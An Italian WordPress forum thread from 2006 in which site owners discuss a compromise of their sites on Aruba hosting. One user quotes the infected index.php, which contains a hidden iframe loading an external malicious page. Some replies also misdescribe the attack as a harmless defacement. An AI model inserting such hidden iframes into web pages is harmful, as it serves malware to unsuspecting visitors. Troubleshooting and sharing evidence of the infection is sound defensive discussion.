Home › Forum › Amministrazione WP › hackeraggio
-
AutorePost
-
-
12 Dicembre 2006 alle 11:47 #2729XsevenPartecipante
Ho installato wordpress 2.0.5 e attualmente è l’ultima versione stable, tuttavia qualcuno è riuscito a infilare nel file index.php (quello che serve per spostare wordpress in un’altra cartella diversa dalla home) una riga che richiama un iframe con un link a una pagina scritta in non so che lingua..chiramente un attacco..
Ho rimosso il link, per due volte, poi ho impostato il file index.php in sola lettura ( di default ha permessi 755 sulserver ). In attesa del terzo tentativo di hacking mi chiedo? Esiste un qualche bug conosciuto che permette di fare una cosa simile, e quindi con la release 2.0.6 dovrei essere tranquillo?
-
12 Dicembre 2006 alle 13:36 #42165nylonPartecipante
ciao Xseven…
su quale hosting hai il sito?
potrebbe essere un hack tramite qualche bug del tuo
provider di hosting.
Sul tuo spazio di hosting hai solamente WordPress?
Se si… quali plugin erano attivi?
Facci sapere!
-
12 Dicembre 2006 alle 23:40 #42190XsevenPartecipante
grazie per la risposta,
dunque, wordpress è la pagina principale del sito, che è lଠtanto per tenere qualcosa di comodo in home perchè poi il sito lo uso come appoggio esterno per alcuni software e per le email, quindi non c’è nulla dip iù di quello che c’è nel pacchetto base italiano
wordpress è inst in una subcartella chiamata “i” mentre il file index è in home, in questo momento è successo di nuovo vi posto tutto il file index hackato:
<iframe src="http://www.st1nger.info/images/it/" width="150" height="150" style="display:none"></iframe>
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./i/wp-blog-header.php');
?>
la riga iframe è di troppo..
Quello che ho potuto notare è che il file index sul sito risulta modificato il 12/12 alle 19.16 mentre io l’ho ripristinato il 12/12 all’1.10… il che mi fa pensare che copi brutalmente una versione premodificata.. ma io i dati ftp non li ho mai usati al di fuori della mia postazione e non li ho mai messi in nessuno script.
Il servizio di hosting è presso aruba con Hosting Linux… altri script c’è solo il forum che non ha niente a che vedere con wordpress perchè è nella cartella /forum per affari suoi, è mybb dite che può essere quello?
-
13 Dicembre 2006 alle 0:19 #42191flashmotusPartecipante
salve xseven,
da pochissime ore ho trasferito il mio sito da server windows a linux su aruba e leggere il tuo post mi fa un pò preoccupare. Ti auguro di risolvere il problema e soprattutto capire se su aruba ci sono falle sui server.
ciao
-
13 Dicembre 2006 alle 11:25 #42195amiciamiciPartecipante
Non credo che sia problema del server: su quello stesso ci saranno 10000 domini, se avesse un problema ce ne sarebbero di segnalazioni.
Prova a campbiare i permessi di scrittura del file index.php in maniera molto restrittiva.
-
13 Dicembre 2006 alle 12:00 #42196wollyAmministratore del forum
Avevo perso questo post.
Il mio blog è su server aruba linux da diversi anni.
Ho circa 250 accessi al giorno e ,per ora, non ho avuto alcun problema.
Sono andato al link che hai nel tuoi index e è in russo probabile sia qualche hacker.
Il mio index ha permessi 755
ciao
wolly
-
13 Dicembre 2006 alle 21:00 #42233XsevenPartecipante
si, ho già impostato i permessi dell’index.php in 555, ma l’ha fatto lo stesso, ora ho controllato, e ancora non è risuccesso nulla..dubito anch’io che sia una falla del server….ho visto che mybb aveva appena fatto uscire una versione per bugfix, e l’ho subito installata… spero che sia quello il problema. Vediamo..
-
16 Dicembre 2006 alle 17:34 #42312XsevenPartecipante
Il problema non si è più presentato..probabile allora che fosse colpa di mybb…
-
18 Dicembre 2006 alle 12:02 #42328talksinaPartecipante
allora,
intanto non è un “hacker” (hacker è tutta un’altra cosa se permetti e niente ha a che vedere coi pirati) ma non ho voglia di far discussioni qua…
tecnicamente è un defacer.
Ma noi chiamiamolo utente malintenzionato che non sbagliamo mai.
Come atto di vandalismo, questo, è paragonabile a un teppista che in qualche maniera manomette i campanelli di casa tua, e anziché mettere il tuo cognome ci mette il proprio. O, per render meglio l’idea, salta il cancello, ti scrive sul muro “pezzo di m…” e poi se ne va.
Non ti ha fatto quindi alcun danno, si è soltanto limitato a dirti “son passato”
In pratica questi utenti malintenzionati (il tipo di attacco si chiama defacement, che tradotto letteralmente significa “privazione della faccia”) si limitano a cambiare la home page del sito, SENZA crear danni, però per dimostrare che quel sito, come è stato possibile manomettere l’index, è facilmente manomissibile anche in altri modi…peggiori.
Che poi, all’utente esterno sembra che il tizio t’abbia svaligiato il sito perché non vede + nulla, è un altro paio di maniche ma non è di questo che si sta parlando.
Io le ho avute varie volte esperienze di defacement, su aruba
Però TUTTE LE VOLTE non era colpa di aruba ma del forum o applicativo inserito nel server. Certo è, però, che aruba poco può fare (il provider che ho adesso, quando gli ho segnalato gli IP di due malintenzionati rumeni, li ha bloccati col firewall, con loro parlo direttamente con Roberto il sistemista, aruba invece il call senter sa manco di niente)
Comunque,
se ti può interessare, come forum mi sento di consigliarti phpbb.
Con, insieme, installato il mod chiamato “cracker tracker professional”
http://www.cback.de oppure http://www.phpbbhacks.com là lo trovi
questo modulo ti traccia gli attacchi in modo spaventoso, dandoti tutti i dati possibili del malintenzionato da eventualmente sistemare
Io ora non ho + avuto bisogno del forum
anche perché sono in restyling. Però, comunque, con ctracker non ho + avuto attacchi in tutto il mese che ho tenuto su tutto. Anzi, dirò di +, nel 2005 non solo mi era stato spulciato via il database di phpbb
Ma, anche, mi era stata eliminata tutta la directory
Perciò, bisogna stare attenti
e cercare di tenere aggiornati per quanto possibile, io ho solo il wp 2.0.4 e ancora non mi fido ad aggiornarlo, magari quando esce la 2.0.6 ci penso
ora come ora ho dei guai + grossi, sempre con wp
-
19 Dicembre 2006 alle 17:29 #42354oviPartecipante
Io sono rumeno ma non faccio ste cose!
Ho anch’io la v.2.0.4 su un sito e sto pensando di passare a 2.0.5 perchè mi pare che la 2.0.6 e’ ancora in fase beta ed è stata sconsigliata l’installazione per esempio su un portale attivo.
Forse attendero’ direttamente la 2.1 ma con i plugin sarà da piangere…
-
20 Dicembre 2006 alle 10:48 #42362talksinaPartecipante
Ma si, ma si, la nazionalità non c’entra, non volevo certo dire che rumeno=defacer
ho solo voluto dire che il server da cui è partito il defacement era situato in Romania, però non significa che quello sia rumeno, magari era italianissimo e s’è collegato a un server rumeno per mascherarsi, boh
btw, non ha importanza
Per wp vedremo
intanto aspetto notizie e informazioni, che sicuramente quando verrà rilasciata la 2.1 non tarderanno ad arrivare.
in ogni caso,
ci sono 2 tipi di attacchi innocui:
quelli che ti fanno il defacement e spariscono
e quelli che ti fanno il defacement e ti scrivono (o sulla pagina stessa o sul forum o ti contattano per mail addirittura) dicendoti che ti hanno trovato questo baco e devi risolverlo cosଠe cosà¬.
A me la prima volta era successo cosà¬
uno era entrato con il mio nome da amministratore, mi aveva scritto che soffrivo di una vulnerabilità “sql injection” mi pare si chiamasse, e mi ha detto di aggiornare phpbb, però ci voleva una settimana per farlo visti i vari moduli che avevo manualmente installato.
Tempo una settimana, e l’attacco si è ripetuto ma questa volta anziché un avvertimento è stata una bomba nel senso che mi è stato cancellato il database.
Non ho però potuto accertare se fosse stato lo stesso utente ostile ad attaccarmi, oppure se fosse stato un altro.
Mi parrebbe troppo assurdo che si potesse trattare della stessa persona, visto che si era messo cosଠesposto dicendomi addirittura cosa dovevo fare, penso piuttosto a uno che ha visto il messaggio dell’altro e vedendo la vulnerabilità la ha sfruttata
-
20 Dicembre 2006 alle 11:29 #42363stummihousePartecipante
Salve a tutti.
Questo è solo il secondo argomento che trovo a proposito.
Ho già sentito di utenti che usano php_nuke su aruba e hanno avuto molteplici visite da questo st1nger, ogni volta con modalità diverse.
Ma voglio parlare del mio caso: ho un sito su server linux, su aruba. non abbiamo programmi di CMS.
Un paio di settimane fa ho trovato l’iframe che anche voi conoscete nella header. Dopo averlo cancellato un paio di volte, ha iniziato a presentarsi un nuovo script, stavolta nella index.
A ieri l’ultima sua “visita”.
Non si limita a dire “ciao sono passato”, ma inserisce nei miei files degli script provenienti da siti esterni, cosଠtutti quelli che usano IE o non hanno le giuste estensioni in Firefox se li sorbiscono senza neanche accorgersene.
Ho un forum, che però è installato da mesi e non aveva mai dato problemi. L’unica cosa sospetta è il servizio di file-hosting, che abbiamo attivato da poco, ma è consentito solo agli utenti registrati!
Ciao e buon proseguimento!
-
20 Dicembre 2006 alle 11:39 #42364talksinaPartecipante
è consentito solo agli utenti registrati… certamente
e chi può dire che non sia proprio un utente registrato, la peste bubbonica?
-
20 Dicembre 2006 alle 11:52 #42366stummihousePartecipante
il fatto che st1nger sia arrivato prima della pubblicazione del servizio
comunque, adesso provo a toglierlo di mezzo
-
20 Dicembre 2006 alle 13:19 #42369talksinaPartecipante
eventualmente questo servizio di caricamento file ha delle vulnerabilità
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.